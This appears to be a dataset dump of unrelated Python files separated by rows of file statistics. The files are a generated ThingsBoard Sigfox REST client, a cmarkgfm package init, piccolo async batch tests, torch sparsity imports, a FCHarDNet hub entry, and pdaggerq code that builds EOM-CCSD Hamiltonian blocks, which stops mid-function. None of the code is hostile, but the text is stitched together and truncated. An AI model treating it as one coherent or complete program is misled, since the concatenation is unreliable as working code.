raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_options1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'OPTIONS',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_patch1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_patch1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_patch1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_patch1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_patch1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_post5(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post5(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_post5_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_post5_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_post5_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post5_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_post5`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_post5`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_post5`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_put1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_put1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_put1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_put1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_put1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_put1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_put1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.77597 | 140 | 0.638648 | 3,975 | 34,977 | 5.351195 | 0.049811 | 0.044756 | 0.056274 | 0.046072 | 0.960651 | 0.957783 | 0.957783 | 0.955949 | 0.954116 | 0.954116 | 0 | 0.0173 | 0.271207 | 34,977 | 798 | 141 | 43.830827 | 0.817151 | 0.326643 | 0 | 0.845972 | 0 | 0 | 0.230096 | 0.071048 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035545 | false | 0 | 0.009479 | 0 | 0.097156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a63aa0bc9d4ef0d60aaacfdedbd99a2bcc1bcb78 | 258 | py | Python | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | null | null | null | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | 1 | 2020-04-08T14:28:08.000Z | 2020-04-08T14:28:08.000Z | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | 1 | 2020-03-30T15:48:20.000Z | 2020-03-30T15:48:20.000Z | from cmarkgfm.cmark import (
github_flavored_markdown_to_html,
markdown_to_html,
markdown_to_html_with_extensions)
__all__ = [
'github_flavored_markdown_to_html',
'markdown_to_html',
'markdown_to_html_with_extensions',
]
| 21.5 | 40 | 0.736434 | 31 | 258 | 5.354839 | 0.387097 | 0.361446 | 0.506024 | 0.53012 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0 | 0 | 0.197674 | 258 | 11 | 41 | 23.454545 | 0.801932 | 0 | 0 | 0 | 0 | 0 | 0.323887 | 0.259109 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a67c131d134953ca6b422520cb038388225e850c | 2,462 | py | Python | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | 1 | 2021-08-22T03:29:08.000Z | 2021-08-22T03:29:08.000Z | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | import asyncio
import math
from ..base import DBTestCase
from ..example_app.tables import Manager
class TestBatchSelect(DBTestCase):
def _check_results(self, batch):
"""
Make sure the data is returned in the correct format.
"""
self.assertTrue(type(batch) == list)
if len(batch) > 0:
row = batch[0]
self.assertTrue(type(row) == dict)
self.assertTrue("name" in row.keys())
self.assertTrue("id" in row.keys())
async def run_batch(self, batch_size):
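        """
        Consume ``Manager.select()`` in batches of ``batch_size`` and return
        the total number of rows seen together with the number of batches
        iterated.
        """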
row_count = 0
iterations = 0
async with await Manager.select().batch(
batch_size=batch_size
) as batch:
async for _batch in batch:
self._check_results(_batch)
_row_count = len(_batch)
row_count += _row_count
iterations += 1
return row_count, iterations
def test_batch(self):
row_count = 1000
self.insert_many_rows(row_count)
batch_size = 10
_row_count, iterations = asyncio.run(
self.run_batch(batch_size=batch_size), debug=True
)
_iterations = math.ceil(row_count / batch_size)
self.assertTrue(_row_count == row_count)
self.assertTrue(iterations == _iterations)
class TestBatchObjects(DBTestCase):
def _check_results(self, batch):
"""
Make sure the data is returned in the correct format.
"""
self.assertTrue(type(batch) == list)
if len(batch) > 0:
row = batch[0]
self.assertTrue(isinstance(row, Manager))
async def run_batch(self, batch_size):
row_count = 0
iterations = 0
async with await Manager.objects().batch(
batch_size=batch_size
) as batch:
async for _batch in batch:
self._check_results(_batch)
_row_count = len(_batch)
row_count += _row_count
iterations += 1
return row_count, iterations
def test_batch(self):
row_count = 1000
self.insert_many_rows(row_count)
batch_size = 10
_row_count, iterations = asyncio.run(
self.run_batch(batch_size=batch_size), debug=True
)
_iterations = math.ceil(row_count / batch_size)
self.assertTrue(_row_count == row_count)
self.assertTrue(iterations == _iterations)
| 27.355556 | 61 | 0.586515 | 284 | 2,462 | 4.827465 | 0.214789 | 0.128373 | 0.078775 | 0.055434 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0 | 0.013301 | 0.328188 | 2,462 | 89 | 62 | 27.662921 | 0.815599 | 0.043461 | 0 | 0.774194 | 0 | 0 | 0.0026 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 1 | 0.064516 | false | 0 | 0.064516 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a69ade6877e9ce4ef06cfdc9b9ff0769096f4696 | 231 | py | Python | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | 1 | 2022-01-25T15:48:31.000Z | 2022-01-25T15:48:31.000Z | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | null | null | null | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | null | null | null | # Parametrizations
from .experimental.pruner.parametrization import PruningParametrization
from .experimental.pruner.parametrization import ActivationReconstruction
# Pruner
from .experimental.pruner.base_pruner import BasePruner
| 33 | 73 | 0.878788 | 21 | 231 | 9.619048 | 0.47619 | 0.237624 | 0.326733 | 0.366337 | 0.425743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073593 | 231 | 6 | 74 | 38.5 | 0.943925 | 0.099567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a6d1b33ffe3d99422e8e050f86c0ee900b8b342c | 133 | py | Python | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | from ptsemseg.models import get_model
def fc_hardnet_70(n_classes):
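    """Torch Hub entry point building an FC-HarDNet-70 model via ptsemseg.

    A minimal usage sketch (repo name taken from this file's location; the
    class count is only an example):
    ``torch.hub.load('Ivan1248/FCHarDNet', 'fc_hardnet_70', n_classes=19)``
    """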
return get_model(dict(arch='hardnet'), n_classes=n_classes)
| 26.6 | 63 | 0.796992 | 22 | 133 | 4.5 | 0.681818 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.105263 | 133 | 4 | 64 | 33.25 | 0.815126 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
5b910ac371c2f76cf6e8712a1c6b711f6bf529c2 | 91,457 | py | Python | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 37 | 2020-09-17T19:29:18.000Z | 2022-03-03T16:29:16.000Z | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 7 | 2021-02-28T19:22:12.000Z | 2022-02-22T15:17:47.000Z | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 6 | 2021-02-16T22:34:29.000Z | 2021-12-04T19:37:23.000Z | # pdaggerq - A code for bringing strings of creation / annihilation operators to normal order.
# Copyright (C) 2020 A. Eugene DePrince III
#
# This file is part of the pdaggerq package.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Functions to build the blocks of the EOM-CCSD similarity-transformed Hamiltonian
"""
import numpy as np
from numpy import einsum
def build_eom_ccsd_H_by_block(kd, f, g, o, v, t1, t2):
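    """
    Build the blocks of the EOM-CCSD similarity-transformed Hamiltonian,
    Hbar = e(-T) H e(T), between the reference (0), singles (s), and
    doubles (d) manifolds; each block H(x;y) is labeled in the comments
    below and accumulated in the corresponding array (H00, Hs0, Hss, ...).

    Argument conventions, inferred from the contractions below:
        kd     -- Kronecker delta (identity) matrix
        f      -- Fock matrix
        g      -- antisymmetrized two-electron integrals <pq||rs>
        o, v   -- slices over occupied / virtual spin orbitals
        t1, t2 -- converged CCSD cluster amplitudes
    """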
# H(0;0) = <0| e(-T) H e(T) |0>
# 1.0000 f(i,i)
H00 = 1.000000000000000 * einsum('ii', f[o, o])
# 1.0000 f(i,a)*t1(a,i)
H00 += 1.000000000000000 * einsum('ia,ai', f[o, v], t1)
# -0.5000 <j,i||j,i>
H00 += -0.500000000000000 * einsum('jiji', g[o, o, o, o])
# 0.2500 <j,i||a,b>*t2(a,b,j,i)
H00 += 0.250000000000000 * einsum('jiab,abji', g[o, o, v, v], t2)
# -0.5000 <j,i||a,b>*t1(a,i)*t1(b,j)
H00 += -0.500000000000000 * einsum('jiab,ai,bj', g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# H(m,e;0) = <0|e1(m,e) e(-T) H e(T) |0>
# 1.0000 f(e,m)
Hs0 = 1.000000000000000 * einsum('em->em', f[v, o])
# -1.0000 f(i,m)*t1(e,i)
Hs0 += -1.000000000000000 * einsum('im,ei->em', f[o, o], t1)
# 1.0000 f(e,a)*t1(a,m)
Hs0 += 1.000000000000000 * einsum('ea,am->em', f[v, v], t1)
# -1.0000 f(i,a)*t2(a,e,m,i)
Hs0 += -1.000000000000000 * einsum('ia,aemi->em', f[o, v], t2)
# -1.0000 f(i,a)*t1(a,m)*t1(e,i)
Hs0 += -1.000000000000000 * einsum('ia,am,ei->em', f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <i,e||a,m>*t1(a,i)
Hs0 += 1.000000000000000 * einsum('ieam,ai->em', g[o, v, v, o], t1)
# -0.5000 <j,i||a,m>*t2(a,e,j,i)
Hs0 += -0.500000000000000 * einsum('jiam,aeji->em', g[o, o, v, o], t2)
# -0.5000 <i,e||a,b>*t2(a,b,m,i)
Hs0 += -0.500000000000000 * einsum('ieab,abmi->em', g[o, v, v, v], t2)
# 1.0000 <j,i||a,b>*t1(a,i)*t2(b,e,m,j)
Hs0 += 1.000000000000000 * einsum('jiab,ai,bemj->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# 0.5000 <j,i||a,b>*t1(a,m)*t2(b,e,j,i)
Hs0 += 0.500000000000000 * einsum('jiab,am,beji->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 0.5000 <j,i||a,b>*t1(e,i)*t2(a,b,m,j)
Hs0 += 0.500000000000000 * einsum('jiab,ei,abmj->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 <j,i||a,m>*t1(a,i)*t1(e,j)
Hs0 += 1.000000000000000 * einsum('jiam,ai,ej->em', g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <i,e||a,b>*t1(a,i)*t1(b,m)
Hs0 += 1.000000000000000 * einsum('ieab,ai,bm->em', g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <j,i||a,b>*t1(a,i)*t1(b,m)*t1(e,j)
Hs0 += 1.000000000000000 * einsum('jiab,ai,bm,ej->em', g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# H(0;i,a) = <0| e(-T) H e(T) e1(a,i)|0>
# 1.0000 f(i,a)
H0s = 1.000000000000000 * einsum('ia->ai', f[o, v])
# -1.0000 <i,j||b,a>*t1(b,j)
H0s += -1.000000000000000 * einsum('ijba,bj->ai', g[o, o, v, v], t1)
# H(m,n,e,f;0) = <0|e2(m,n,f,e) e(-T) H e(T) |0>
# -1.0000 P(m,n)f(i,n)*t2(e,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('in,efmi->efmn', f[o, o], t2)
Hd0 = 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 1.0000 P(e,f)f(e,a)*t2(a,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ea,afmn->efmn', f[v, v], t2)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 P(m,n)f(i,a)*t1(a,n)*t2(e,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('ia,an,efmi->efmn', f[o, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(e,f)f(i,a)*t1(e,i)*t2(a,f,m,n)
contracted_intermediate = -1.000000000000000 * einsum('ia,ei,afmn->efmn', f[o, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 <e,f||m,n>
Hd0 += 1.000000000000000 * einsum('efmn->efmn', g[v, v, o, o])
# 1.0000 P(e,f)<i,e||m,n>*t1(f,i)
contracted_intermediate = 1.000000000000000 * einsum('iemn,fi->efmn', g[o, v, o, o], t1)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 P(m,n)<e,f||a,n>*t1(a,m)
contracted_intermediate = 1.000000000000000 * einsum('efan,am->efmn', g[v, v, v, o], t1)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.5000 <j,i||m,n>*t2(e,f,j,i)
Hd0 += 0.500000000000000 * einsum('jimn,efji->efmn', g[o, o, o, o], t2)
# 1.0000 P(m,n)*P(e,f)<i,e||a,n>*t2(a,f,m,i)
contracted_intermediate = 1.000000000000000 * einsum('iean,afmi->efmn', g[o, v, v, o], t2)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 0.5000 <e,f||a,b>*t2(a,b,m,n)
Hd0 += 0.500000000000000 * einsum('efab,abmn->efmn', g[v, v, v, v], t2)
# 1.0000 P(m,n)<j,i||a,n>*t1(a,i)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jian,ai,efmj->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.5000 P(m,n)<j,i||a,n>*t1(a,m)*t2(e,f,j,i)
contracted_intermediate = 0.500000000000000 * einsum('jian,am,efji->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(m,n)*P(e,f)<j,i||a,n>*t1(e,i)*t2(a,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('jian,ei,afmj->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 1.0000 P(e,f)<i,e||a,b>*t1(a,i)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ieab,ai,bfmn->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 P(m,n)*P(e,f)<i,e||a,b>*t1(a,n)*t2(b,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('ieab,an,bfmi->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 0.5000 P(e,f)<i,e||a,b>*t1(f,i)*t2(a,b,m,n)
contracted_intermediate = 0.500000000000000 * einsum('ieab,fi,abmn->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 <j,i||m,n>*t1(e,i)*t1(f,j)
Hd0 += -1.000000000000000 * einsum('jimn,ei,fj->efmn', g[o, o, o, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 P(m,n)*P(e,f)<i,e||a,n>*t1(a,m)*t1(f,i)
contracted_intermediate = 1.000000000000000 * einsum('iean,am,fi->efmn', g[o, v, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# -1.0000 <e,f||a,b>*t1(a,n)*t1(b,m)
